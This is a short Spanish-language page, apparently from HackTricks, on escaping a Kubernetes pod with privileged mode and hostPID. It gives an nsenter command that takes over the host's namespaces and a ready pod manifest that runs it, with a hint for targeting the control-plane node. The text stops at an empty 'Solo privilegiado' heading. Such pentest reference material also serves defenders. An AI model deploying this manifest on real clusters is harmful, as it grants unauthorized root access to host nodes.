Pod Escape Privileges

Privilegios de escape de Pod

¡Apoya a HackTricks y obtén beneficios!

Privilegios y hostPID

Con estos privilegios tendrás acceso a los procesos del host y suficientes privilegios para ingresar dentro del namespace de uno de los procesos del host. Ten en cuenta que potencialmente no necesitas privilegios, sino solo algunas capacidades y otros posibles bypasses de defensas (como apparmor y/o seccomp).

Simplemente ejecutar algo como lo siguiente te permitirá escapar del pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Ejemplo de configuración:

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Forzar que el pod se ejecute en el nodo de control-plane descomentando esta línea y cambiando el nombre del nodo de control-plane

Solo privilegiado

Última actualización